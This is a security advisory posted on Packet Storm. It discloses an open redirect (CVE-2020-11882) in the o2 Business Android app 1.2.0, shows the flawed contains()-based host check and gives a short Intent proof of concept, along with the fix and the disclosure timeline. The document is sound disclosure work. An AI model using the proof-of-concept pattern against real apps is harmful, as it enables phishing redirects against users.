exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Android o2 Business 1.2.0 Open Redirect

Android o2 Business 1.2.0 Open Redirect
Posted Jul 3, 2020
Authored by Julien Ahrens | Site rcesecurity.com

o2 Business for Android version 1.2.0 suffers from an open redirection vulnerability.

tags | exploit
advisories | CVE-2020-11882
SHA-256 | ed073540b55db066df4e43d61452b19af671d57a6dad0ef1271c98600b232356

Android o2 Business 1.2.0 Open Redirect

Change Mirror Download
RCE Security Advisory
https://www.rcesecurity.com


1. ADVISORY INFORMATION
=======================
Product: o2 Business for Android
Vendor URL: https://play.google.com/store/apps/details?id=telefonica.de.o2business
Type: Open Redirect [CWE-601]
Date found: 2020-04-16
Date published: 2020-07-01
CVSSv3 Score: 3.3 (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N)
CVE: CVE-2020-11882


2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.


3. VERSIONS AFFECTED
====================
o2 Business App for Android 1.2.0


4. INTRODUCTION
===============
Kommunikation ist Ihr tägliches Sprungbrett in die Geschäftswelt. Und mit der
neuen O2 Business App haben Sie alle wichtigen Details stets vor Augen.
Verfolgen Sie investierte Gesprächszeiten zurück und sehen Sie verfügbare
Kommunikations-Kapazitäten vorher. Vom aktuellen Stand des Inklusiv-Volumens,
über Einzelverbindungen und Tarifdetails, bis zur lokalen Netz-Qualität behalten
Sie mit der O2 Business App immer und überall den Durchblick. Erfahren Sie jetzt
mehr über Ihren informativen Begleiter!

(from the vendor's homepage)


5. VULNERABILITY DETAILS
========================
The "O2 Business App" for Android exposes an activity to other apps called
"canvasm.myo2.SplashActivity". The purpose of this activity is to handle
deeplinks which can be delivered to the app either via links or by directly
calling the activity.

However, the app does not properly validate the format of deeplinks by just
using str.contains() to verify the allowed host:

private boolean isVanityLink(String str) {
return str.contains("https://o2.de") || str.contains("https://blau.de")
|| str.contains("https://e2e2.o2.de") ||
str.contains("https://e2e2.blau.de");
}

private boolean isDeepLink(String str) {
return str.contains("https://www.o2online.de")
|| str.contains("https://www.blau.de")
|| str.contains("https://e2e2.o2online.de")
|| str.contains("https://e2e2.blau.de")
|| str.contains(BuildConfig.PIRANHA_BASE_E2E2_URL)
|| str.contains("https://login.o2online.de")
|| str.contains("https://login-e2e2.blau.de")
|| str.contains("https://login.blau.de");
}

This can be abused by an attacker (malicious app) to redirect a user to any page
and deliver any content to the user. An exemplary exploit could look like the
following:

Intent i = new Intent();
i.setComponent(new ComponentName("telefonica.de.o2business", "canvasm.myo2.SplashActivity"));
Uri uri = Uri.parse("https://www.rcesecurity.com?dummy=https://o2.de");
i.setData(uri);
startActivity(i);


6. RISK
=======
A malicious app on the same device is able to exploit this vulnerability to lead
the user to any webpage/content. The specific problem here is the assumed trust
boundary between the user having the o2 Business app installed and what the app
is actually doing/displaying to the user. So if the user sees the app being
loaded and automatically redirecting to another page, it can be assumed that the
loaded page is also trusted by the user.


7. SOLUTION
===========
Update the app to version 1.3.0


8. REPORT TIMELINE
==================
2020-04-16: Discovery of the vulnerability
2020-04-16: Although Telefonica runs a VDP on Bugcrowd
(https://bugcrowd.com/telefonicavdp), I did not want to accept their non-
disclosure terms, which is why I have tried to contact them directly via their
official CERT contact.
2020-04-16: Telefonica responds and asks for full vulnerability details
2020-04-16: Send over the full advisory including a full PoC exploit.
2020-04-16: Telefonica acknowledges the issue
2020-04-16: CVE requested from MITRE
2020-04-17: MITRE assigns CVE-2020-11882
2020-06-03: No further communication from Telefonica. Mailed them again about
the status of the fix.
2020-06-03: Telefonica is still working on this issue and the fix is scheduled
to be included in the next release.
2020-06-04: Version 1.3.0 is released
2020-07-01: Public disclosure.


9. REFERENCES
=============
-


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close